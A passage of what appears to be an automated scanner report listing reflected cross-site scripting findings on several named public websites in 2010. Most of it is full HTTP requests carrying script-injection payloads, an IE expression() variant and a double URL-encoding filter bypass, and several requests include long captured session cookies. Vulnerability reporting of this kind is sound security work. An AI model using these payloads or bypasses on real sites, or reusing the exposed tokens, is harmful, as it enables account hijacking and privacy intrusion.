2.144. http://myspace.videosurf.com/video/the-invisibles-part-one-seaworld-english-1239815528 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f62dd"><script>alert(1)</script>f13f92228eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /video/the-invisibles-part-one-seaworld-english-1239815528?f62dd"><script>alert(1)</script>f13f92228eb=1 HTTP/1.1 Host: myspace.videosurf.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the vlt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3dc97"><script>alert(1)</script>4f0431d3213 was submitted in the vlt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /video/the-invisibles-part-one-seaworld-english-1239815528?vlt=myspace3dc97"><script>alert(1)</script>4f0431d3213 HTTP/1.1 Host: myspace.videosurf.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f52e6"><script>alert(1)</script>b84ec9d5f23 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /videosf52e6"><script>alert(1)</script>b84ec9d5f23/' HTTP/1.1 Host: myspace.videosurf.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68f6b"><script>alert(1)</script>318850b51ea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /videos/'68f6b"><script>alert(1)</script>318850b51ea HTTP/1.1 Host: myspace.videosurf.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml ...[SNIP]... <meta property="og:url" content="http://myspace.videosurf.com/videos/'68f6b"><script>alert(1)</script>318850b51ea"/> ...[SNIP]...
2.148. http://myspace.videosurf.com/videos/' [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://myspace.videosurf.com
Path:
/videos/'
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f540"><script>alert(1)</script>1833c6fd0c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /videos/'?2f540"><script>alert(1)</script>1833c6fd0c5=1 HTTP/1.1 Host: myspace.videosurf.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91a42"><script>alert(1)</script>e44f5d0946f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon91a42"><script>alert(1)</script>e44f5d0946f/people_search/myspace HTTP/1.1 Host: network.videosurf.com Proxy-Connection: keep-alive Referer: http://www.myspace.com/search/people?q='&ac=t Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the sc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72933"><script>alert(1)</script>da10c2a3e86 was submitted in the sc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /AW-WP-LS4ES.html?sc=WP-LS4ES-GS1U72933"><script>alert(1)</script>da10c2a3e86&_kk=intranet%20search&_kt=ed18f41f-c691-4861-bd74-c8fab6a6d457/x22 HTTP/1.1 Host: programs.lucidimagination.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Set-Cookie: ARPT=LWYXXLSGw2CYLQ; path=/ Date: Sat, 11 Dec 2010 18:15:35 GMT Server: Apache Content-Length: 27011 Vary: *,Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-200000126/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" l ...[SNIP]... <input class='mktFormHidden' name="Web_Source_Type__c" id="Web_Source_Type__c" type='hidden' value="WP-LS4ES-GS1U72933"><script>alert(1)</script>da10c2a3e86" /> ...[SNIP]...
The value of the sc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f77b"><script>alert(1)</script>dd903c9789a was submitted in the sc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /AW-WP-Starting.html?sc=WP-START-GS1U7f77b"><script>alert(1)</script>dd903c9789a&_kk=intranet%20search%20engine&_kt=21825d11-df4f-47a4-b659-cc8be4a11a7b/x22 HTTP/1.1 Host: programs.lucidimagination.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Set-Cookie: ARPT=LWYXXLSGw1CYLO; path=/ Date: Sat, 11 Dec 2010 18:15:35 GMT Server: Apache Content-Length: 27222 Vary: *,Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-200000126/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" l ...[SNIP]... <input class='mktFormHidden' name="Web_Source_Type__c" id="Web_Source_Type__c" type='hidden' value="WP-START-GS1U7f77b"><script>alert(1)</script>dd903c9789a" /> ...[SNIP]...
2.152. https://secure.shareit.com/shareit/cart.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://secure.shareit.com
Path:
/shareit/cart.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5729f"style%3d"x%3aexpression(alert(1))"ed5840556f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5729f"style="x:expression(alert(1))"ed5840556f1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /shareit/cart.html?productid=300057806¤cies=USD&js=0&5729f"style%3d"x%3aexpression(alert(1))"ed5840556f1=1 HTTP/1.1 Host: secure.shareit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BIGipServerp-dc5-e5-moonlight-sol-01=838993162.20480.0000;
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:17:24 GMT Server: Apache P3P: policyref="https://secure.element5.com/w3c/p3p.xml", CP="CAO DSP COR ADMo PSA CONo HIS OUR SAMo UNRo LEG UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 48235
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>share*it! - A service of Digital River (DEF03)</title> <style type=" ...[SNIP]... <form action="/shareit/cart.html?currencies=USD&js=0&5729f"style="x:expression(alert(1))"ed5840556f1=1&sessionid=1800044594&random=73ee187dc9960f099e807ed1d9f39120&sessionid=1800044594&random=73ee187dc9960f099e807ed1d9f39120" method="post"> ...[SNIP]...
2.153. https://secure.shareit.com/shareit/product.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://secure.shareit.com
Path:
/shareit/product.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d392f"style%3d"x%3aexpression(alert(1))"3005d8d59cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d392f"style="x:expression(alert(1))"3005d8d59cb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /shareit/product.html?sessionid=1800022192&random=653532a7deb50ad19c4cc7e5d4305662&productid=300057806&d392f"style%3d"x%3aexpression(alert(1))"3005d8d59cb=1 HTTP/1.1 Host: secure.shareit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BIGipServerp-dc5-e5-moonlight-sol-01=838993162.20480.0000;
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:17:12 GMT Server: Apache P3P: policyref="https://secure.element5.com/w3c/p3p.xml", CP="CAO DSP COR ADMo PSA CONo HIS OUR SAMo UNRo LEG UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 41502
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>share*it! - A service of Digital River (DEF03) - Bean Software Searc ...[SNIP]... <form action="/shareit/product.html?productid=300057806&d392f"style="x:expression(alert(1))"3005d8d59cb=1&sessionid=1800022192&random=653532a7deb50ad19c4cc7e5d4305662&sessionid=1800022192&random=653532a7deb50ad19c4cc7e5d4305662" method="post"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75281%2522%253e%253ca%253ebc4fa03f4e7 was submitted in the REST URL parameter 1. This input was echoed as 75281"><a>bc4fa03f4e7 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us75281%2522%253e%253ca%253ebc4fa03f4e7/library/aa991542.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10199 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:57:21 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us75281"><a>bc4fa03f4e7/library/aa991542" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bf0f%2522%253e%253ca%253e84fddc32f18 was submitted in the REST URL parameter 2. This input was echoed as 9bf0f"><a>84fddc32f18 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library9bf0f%2522%253e%253ca%253e84fddc32f18/aa991542.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10199 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:57:28 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library9bf0f"><a>84fddc32f18/aa991542" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6463%2522%253e%253ca%253efc79662f9f2 was submitted in the REST URL parameter 3. This input was echoed as e6463"><a>fc79662f9f2 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/aa991542.aspxe6463%2522%253e%253ca%253efc79662f9f2 HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10210 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:57:35 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/aa991542.aspxe6463"><a>fc79662f9f2" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46021%2522%253e%253ca%253eead3e3d9a48 was submitted in the REST URL parameter 1. This input was echoed as 46021"><a>ead3e3d9a48 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us46021%2522%253e%253ca%253eead3e3d9a48/library/bb625087.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; 